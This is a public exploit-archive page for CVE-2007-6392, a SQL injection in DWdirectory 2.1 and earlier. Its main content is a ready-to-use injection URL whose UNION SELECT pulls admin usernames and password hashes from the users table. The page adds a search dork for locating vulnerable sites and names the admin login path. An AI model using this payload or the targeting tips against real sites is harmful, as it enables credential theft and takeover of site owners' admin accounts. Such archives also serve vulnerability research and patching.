[] NeoSense
E X P L O I T S
title author type platform port cve id

DWdirectory 2.1 - SQL Injection

Author: t0pP8uZz
type: webapps
platform: php
port: 
date_added: 2007-12-08 
date_updated:  
verified: 1 
codes: OSVDB-39113;CVE-2007-6392 
tags: 
aliases:  
screenshot_url:  
application_url: 
--==+================================================================================+==--
--==+		    DWdirectory 2.1 AND PRIOR SQL Injection Vulnerbility             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK (altavista.com): "Powered by DWdirectory"


DESCRIPTION:
pull admin info from the database

EXPLOITS:
www.site.com/search?search=null'+and+1=2+UNION+ALL+SELECT+concat(username,char(58),password),2,3,4+FROM+users/**/LIMIT/**/0,1/*&submit=Search


NOTE/TIP:
admin login is at /admin/

GREETZ: milw0rm.com, h4ck-y0u.org !


--==+================================================================================+==--
--==+		    DWdirectory 2.1 AND PRIOR SQL Injection Vulnerbility             +==--
--==+================================================================================+==--

# milw0rm.com [2007-12-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.